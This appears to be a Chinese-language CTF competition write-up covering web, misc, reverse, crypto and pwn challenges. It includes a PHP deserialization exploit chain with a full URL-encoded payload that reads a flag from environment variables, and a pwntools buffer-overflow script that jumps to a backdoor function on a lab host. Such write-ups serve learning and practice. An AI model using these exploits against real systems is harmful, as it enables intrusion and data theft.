第一次线下拿第一,比赛不戳,茶歇针多啊
image-20241128212133635

web

dino

打游戏拿10000分给flag

前端发现api.php,aes解密发送score

image-20241128093344212

拿到key和iv加密发包

image-20241128093357825

image-20241128131102261

ezphp

exp:

<?php
class SensitiveData{
    public function __toString(){
        echo "Sensitive Data Accessed<br>";
        return getenv("FLAG")."<br>";
    }
}

class Logger{
    public $log;
    public function __wakeup()
    {
        echo "<br>Logger Initialized<br>";
        var_dump($this->log);
    }
}

class DataProcessor{
    public $data;
    public $processor;
    public $errorHandler;
    public function __debugInfo()
    {
        $this->errorHandler = new ErrorHandler();
        echo "Processing Data<br>";
        if($this->data){
            echo $this->processor;
        }else{
            echo ($this->errorHandler)();
        }
    }
}

$B=new DataProcessor();
$B->data=1;
$B->processor=new SensitiveData();
$A=new Logger();
$A->log = $B;
echo urlencode(serialize($A));

payload

http://10.240.0.11:10559/?data=O%3A6%3A%22Logger%22%3A1%3A%7Bs%3A3%3A%22log%22%3BO%3A13%3A%22DataProcessor%22%3A3%3A%7Bs%3A4%3A%22data%22%3Bi%3A1%3Bs%3A9%3A%22processor%22%3BO%3A13%3A%22SensitiveData%22%3A0%3A%7B%7Ds%3A12%3A%22errorHandler%22%3BN%3B%7D%7D

image-20241128094709413

recover

/backup下有个压缩包

image-20241128102404509

查看环境变量发现unzip_pwd=afsa76as7ad

image-20241128103016968

image-20241128103036187

Test Your Hamburger

根据提示改http头

image-20241128102946410

misc

Welcome

image-20241128133059465

黑神话:悟空

png改宽高

image-20241128115511053

数据库

flag头base64加密

image-20241128093133232

直接搜

image-20241128093158982

image-20241128093210227

ez data recovery

发现base64信息

image-20241128130431622

解密发现是elf文件

image-20241128130422666

逆一下,确定有连接

image-20241128133022910

运行

image-20241128130058236

ss查看tcp连接

image-20241128130101610

合规文档

word中清除所有格式
key

image-20241128145900501

vi

image-20241128145922129

enc

image-20241128150013313

des解密

image-20241128145841538

re

checkin

简单换表

image-20241128114401352

image-20241128114414496

image-20241128114512433

Rev02

nop掉花指令

image-20241128105427596

F5

image-20241128113032680

异或用的box是固定的,输入1111111111111111111111111111111拿到box

image-20241128113045512

得到passwd

image-20241128113312869

md发现原来passwd不是flag,那不直接改eip秒了,你妹的

image-20241128113412349

image-20241128113525570

crypto

XOR

xor爆破一下

image-20241128132637878

pwn

backdoor

0x100溢出

image-20241128104546741

给了后门

image-20241128104600270

from pwn import*
p=remote("10.240.0.11","11115")
payload=b'a'*72+p64(0x401216)
p.send(payload)
p.interactive()

image-20241128104532942